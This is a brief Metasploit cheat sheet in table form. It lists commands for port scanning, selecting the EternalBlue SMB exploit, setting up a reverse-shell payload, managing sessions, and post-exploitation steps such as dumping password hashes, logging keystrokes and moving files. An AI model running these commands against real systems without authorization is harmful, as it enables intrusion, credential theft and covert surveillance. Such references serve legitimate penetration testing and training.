Command | Purpose |
---|---|
msfconsole | Launch Metasploit CLI interface |
search [term] | Find modules by keyword |
use auxiliary/scanner/portscan/tcp | Run TCP port scan |
use auxiliary/scanner/http/title | Grab web page titles for discovery |
services | List discovered services from scans |
Command | Purpose |
---|---|
use exploit/windows/smb/ms17_010_eternalblue | Select exploit module |
show options | Display required settings for module |
set RHOSTS [target] | Set target IP address |
set LHOST [your IP] | Set local IP for reverse shell |
set PAYLOAD [type] | Choose payload (e.g. reverse_tcp) |
Command | Purpose |
---|---|
exploit | Launch the exploit |
run | Alias for exploit (used in auxiliary modules) |
sessions | List active sessions |
sessions -i [ID] | Interact with a specific session |
Command | Purpose |
---|---|
sysinfo | Display target system info |
hashdump | Dump password hashes |
keyscan_start / keyscan_dump | Start and dump keystroke logs |
upload / download | Transfer files to/from target |
shell | Drop into system shell |